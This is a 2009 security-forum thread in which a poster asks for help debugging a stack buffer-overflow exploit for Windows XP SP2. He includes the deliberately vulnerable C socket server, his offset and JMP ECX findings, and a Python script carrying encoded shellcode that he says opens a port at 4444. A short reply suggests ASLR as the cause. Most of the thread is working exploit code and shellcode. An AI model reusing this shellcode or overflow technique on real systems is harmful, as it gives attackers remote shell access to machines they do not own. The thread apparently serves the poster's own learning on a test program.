abhijit_mohanta Just Arrived
Joined: 17 Jan 2009 Posts: 0
|
Posted: Wed Jan 21, 2009 8:33 am Post subject: help in writing exploits win32 xp sp2 |
|
|
I am bit new to exploitation.But I know the basics.I have to write exploit for the following C code
---------------------------------------------------
Code: |
#include <iostream>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion;
WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
} |
----------------------------------------------------
I complied the code on devcpp on windows xp sp2 (so no stack protection canarie)
After sending a pattern I find out that ECX points to the first character of our input eip overwritten at 524 bytes.
ESP points to string at the 528 character
so I find a jmp ECX.
and create a pattern like [AAA...524][BBBB][CCCC..]
I find EIP overwritten with BBBB
So in explot I replace BBBB with the address of JMP ECX
So I send the following exploit
C:>python exploit.py|nc localhost 200
exploit.py
-------------------------------------------------------------------------
buffer = '\x90' * 100
buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"
buffer += '\x90' * 100
buffer += '\xC3\x2C\x82\x77' #jmp ECX
buffer += '\x90'*100
print buffer
#jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
-----------------------------------------------------------
The above shellcode is for tcp connect opens a port at 4444.I have tested the shellcode.It works fine .
But I dont find the exploit working.
I simply crashes the program.
Please suggest me why so.
Please help as soon as possible
I have tested the shellcode
Moderator note: added code tags - capi
|
|
clonmac Just Arrived
Joined: 09 Mar 2009 Posts: 0
|
Posted: Mon Apr 13, 2009 5:54 pm Post subject: |
|
|
Have you varified that the computer running the process is not using address space layout randomization (ASLR)?
When you debug to find the values of eip, debug several times to ensure that the eip location stays the same each time you run it. If it changes every time, then the computer is using ASLR which means that your exploit the way it is written won't work. There are ways around ASLR though.
|
|